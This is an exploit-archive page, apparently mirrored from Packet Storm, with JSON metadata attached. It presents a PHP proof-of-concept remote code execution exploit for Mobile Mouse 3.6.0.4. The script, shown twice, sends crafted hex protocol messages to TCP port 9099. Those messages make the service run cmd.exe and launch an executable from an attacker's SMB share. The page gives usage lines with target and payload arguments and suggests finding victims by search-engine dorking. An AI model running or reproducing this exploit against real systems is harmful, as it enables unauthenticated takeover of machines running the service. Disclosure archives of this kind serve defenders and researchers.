📄 Mobile Mouse 3.6.0.4 Remote Code Execution_PACKETSTORM:214115

Description

Mobile Mouse version 3.6.0.4 remote code execution proof of concept exploit written in php that takes advantage of an older flaw from 2022...

Visit Original Source

Basic Information

ID PACKETSTORM:214115

Published Jan 21, 2026 at 00:00

Affected Product

Affected Versions =============================================================================================================================================
| # Title : Mobile Mouse 3.6.0.4 php Code Execution Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 136.0.0 (64 bits) |
| # Vendor : https://www.mobilemouse.com/downloads/setup.exe |
=============================================================================================================================================

POC :

[+] Dorking İn Google Or Other Search Enggine.

[+] Code Description: a remote code execution (RCE) vulnerability affecting Mobile Mouse version 3.6.0.4 on Windows systems.
The flaw allows a remote attacker to execute arbitrary commands on a vulnerable machine by abusing the Mobile Mouse service listening on TCP port 9099.
By crafting specific protocol messages, an attacker can instruct the service to launch a system command that retrieves and executes a malicious payload from a remote SMB share.

[+] The provided proof of concept (PoC) is written in PHP and demonstrates how an attacker can:

Connect to a target running Mobile Mouse 3.6.0.4

Interact with the Mobile Mouse protocol

Trigger execution of a command that downloads and runs an external executable via a network share

This exploit is described as a second version or refinement of an exploit originally disclosed in September 2022, with references to Packet Storm Security advisories. The PoC assumes the attacker has already set up an SMB share to host the payload.

[+] Impact:

Successful exploitation can result in full remote code execution with the privileges of the Mobile Mouse service, potentially leading to complete system compromise.

[+] Affected platform:

Windows (tested on Windows 10 Pro, French edition)

[+] Risk level:

High, due to unauthenticated remote exploitation on a network-exposed service.

(Related : https://packetstorm.news/files/id/172071/ Related CVE numbers: ) .

[+] save code as poc.php.

[+] Usage: php script.php --target=192.168.1.100 --file=payload.exe --lhost=192.168.1.50

[+] PayLoad :

<?php

function smb_server($lhost, $file_to_serve) {
echo "[+] SMB server functionality not implemented in PHP. You need to set up an SMB share manually.\n";
}

$help = "Mobile Mouse 3.6.0.4 Remote Code Execution";

$options = getopt("", ["target:", "file:", "lhost::"]);

if (!isset($options["target"]) || !isset($options["file"])) {
die("Usage: php script.php --target=<Target IP> --file=<File to Upload> [--lhost=<Local IP>] \n");
}

$host = $options["target"];
$command_shell = $options["file"];
$lhost = isset($options["lhost"]) ? $options["lhost"] : "127.0.0.1";
$port = 9099;

$socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
if ($socket === false) {
die("[-] Socket creation failed: " . socket_strerror(socket_last_error()) . "\n");
}

socket_set_option($socket, SOL_SOCKET, SO_SNDBUF, 256);

if (!socket_connect($socket, $host, $port)) {
die("[-] Connection failed: " . socket_strerror(socket_last_error()) . "\n");
}

echo "[+] Connected to $host on port $port\n";

// Start SMB Server (Placeholder in PHP, should be done manually)
smb_server($lhost, $command_shell);

$CONN = hex2bin("434F4E4E4543541E1E63686F6B726968616D6D6564691E6950686F6E651E321E321E04");
socket_send($socket, $CONN, strlen($CONN), 0);

$run = socket_read($socket, 54);

$RUN = hex2bin("4b45591e3131341e721e4f505404");
socket_send($socket, $RUN, strlen($RUN), 0);

$run = socket_read($socket, 54);

sleep(1);

$payload = "cmd.exe /c start /B \\\\" . $lhost . "\\share\\" . $command_shell;
$hex_payload = bin2hex($payload);

$SHELL = hex2bin("4B45591E3130301E" . $hex_payload . "1E04" . "4b45591e2d311e454e5445521e04");
socket_send($socket, $SHELL, strlen($SHELL), 0);

$shell = socket_read($socket, 96);

echo "Take The rose...\n";

sleep(30);

socket_close($socket);

Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================

{
    "lastseen": "2026-01-21T15:44:21",
    "description": "Mobile Mouse version 3.6.0.4 remote code execution proof of concept exploit written in php that takes advantage of an older flaw from 2022...",
    "published": "2026-01-21T00:00:00",
    "modified": "2026-01-21T00:00:00",
    "type": "packetstorm",
    "title": "\ud83d\udcc4 Mobile Mouse 3.6.0.4 Remote Code Execution",
    "source": "",
    "references": "",
    "id": "PACKETSTORM:214115",
    "bulletinFamily": "exploit",
    "cwe": null,
    "cvelist": [],
    "sourceData": "=============================================================================================================================================\n    | # Title     : Mobile Mouse 3.6.0.4 php Code Execution Vulnerability                                                                       |\n    | # Author    : indoushka                                                                                                                   |\n    | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 136.0.0 (64 bits)                                                            |\n    | # Vendor    : https://www.mobilemouse.com/downloads/setup.exe                                                                             |\n    =============================================================================================================================================\n    \n    POC :\n    \n    [+] Dorking \u0130n Google Or Other Search Enggine.\n    \n    [+] Code Description: a remote code execution (RCE) vulnerability affecting Mobile Mouse version 3.6.0.4 on Windows systems.\n                          The flaw allows a remote attacker to execute arbitrary commands on a vulnerable machine by abusing the Mobile Mouse service listening on TCP port 9099. \n    \t\t\t\t\t  By crafting specific protocol messages, an attacker can instruct the service to launch a system command that retrieves and executes a malicious payload from a remote SMB share.\n    \n    [+] The provided proof of concept (PoC) is written in PHP and demonstrates how an attacker can:\n    \n    Connect to a target running Mobile Mouse 3.6.0.4\n    \n    Interact with the Mobile Mouse protocol\n    \n    Trigger execution of a command that downloads and runs an external executable via a network share\n    \n    This exploit is described as a second version or refinement of an exploit originally disclosed in September 2022, with references to Packet Storm Security advisories. The PoC assumes the attacker has already set up an SMB share to host the payload.\n    \n    [+] Impact:\n    \n    Successful exploitation can result in full remote code execution with the privileges of the Mobile Mouse service, potentially leading to complete system compromise.\n    \n    [+] Affected platform:\n    \n    Windows (tested on Windows 10 Pro, French edition)\n    \n    [+] Risk level:\n    \n    High, due to unauthenticated remote exploitation on a network-exposed service.\n    \n       (Related : https://packetstorm.news/files/id/172071/ Related CVE numbers:   ) .\n    \t\n    [+] save code as poc.php.\n    \n    [+] Usage: php script.php --target=192.168.1.100 --file=payload.exe --lhost=192.168.1.50\n    \n    [+] PayLoad :\n    \n    <?php\n    \n    function smb_server($lhost, $file_to_serve) {\n        echo \"[+] SMB server functionality not implemented in PHP. You need to set up an SMB share manually.\\n\";\n    }\n    \n    $help = \"Mobile Mouse 3.6.0.4 Remote Code Execution\";\n    \n    $options = getopt(\"\", [\"target:\", \"file:\", \"lhost::\"]);\n    \n    if (!isset($options[\"target\"]) || !isset($options[\"file\"])) {\n        die(\"Usage: php script.php --target=<Target IP> --file=<File to Upload> [--lhost=<Local IP>] \\n\");\n    }\n    \n    $host = $options[\"target\"];\n    $command_shell = $options[\"file\"];\n    $lhost = isset($options[\"lhost\"]) ? $options[\"lhost\"] : \"127.0.0.1\";\n    $port = 9099;\n    \n    $socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);\n    if ($socket === false) {\n        die(\"[-] Socket creation failed: \" . socket_strerror(socket_last_error()) . \"\\n\");\n    }\n    \n    socket_set_option($socket, SOL_SOCKET, SO_SNDBUF, 256);\n    \n    if (!socket_connect($socket, $host, $port)) {\n        die(\"[-] Connection failed: \" . socket_strerror(socket_last_error()) . \"\\n\");\n    }\n    \n    echo \"[+] Connected to $host on port $port\\n\";\n    \n    // Start SMB Server (Placeholder in PHP, should be done manually)\n    smb_server($lhost, $command_shell);\n    \n    $CONN = hex2bin(\"434F4E4E4543541E1E63686F6B726968616D6D6564691E6950686F6E651E321E321E04\");\n    socket_send($socket, $CONN, strlen($CONN), 0);\n    \n    $run = socket_read($socket, 54);\n    \n    $RUN = hex2bin(\"4b45591e3131341e721e4f505404\");\n    socket_send($socket, $RUN, strlen($RUN), 0);\n    \n    $run = socket_read($socket, 54);\n    \n    sleep(1);\n    \n    $payload = \"cmd.exe /c start /B \\\\\\\\\" . $lhost . \"\\\\share\\\\\" . $command_shell;\n    $hex_payload = bin2hex($payload);\n    \n    $SHELL = hex2bin(\"4B45591E3130301E\" . $hex_payload . \"1E04\" . \"4b45591e2d311e454e5445521e04\");\n    socket_send($socket, $SHELL, strlen($SHELL), 0);\n    \n    $shell = socket_read($socket, 96);\n    \n    echo \"Take The rose...\\n\";\n    \n    sleep(30);\n    \n    socket_close($socket);\n    \n    \n    \n    Greetings to :=====================================================================================\n    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|\n    ===================================================================================================",
    "sourceHref": "https://packetstorm.news/download/214115",
    "cvss": {
        "score": 0,
        "severity": "NONE",
        "vector": "NONE",
        "version": "NONE"
    },
    "cvss2": [],
    "cvss3": {
        "version": "",
        "vectorString": "",
        "baseScore": 0,
        "baseSeverity": "",
        "attackVector": "",
        "attackComplexity": "",
        "privilegesRequired": "",
        "userInteraction": "",
        "scope": "",
        "confidentialityImpact": "",
        "integrityImpact": "",
        "availabilityImpact": "",
        "cvssV3": {
            "version": "",
            "vectorString": "",
            "baseScore": 0,
            "baseSeverity": "",
            "attackVector": "",
            "attackComplexity": "",
            "privilegesRequired": "",
            "userInteraction": "",
            "scope": "",
            "confidentialityImpact": "",
            "integrityImpact": "",
            "availabilityImpact": ""
        }
    },
    "href": "https://packetstorm.news/files/id/214115/",
    "category_name": "Exploit",
    "post_link": "",
    "product": "",
    "version": "",
    "vendor": "",
    "ai_description": "",
    "ai_severity": "",
    "ai_vendor": "",
    "ai_product": "",
    "ai_version": "",
    "ai_score": 0
}

Description

Basic Information

Affected Product

💭 Join the Security Discussion ❌ Cancel Reply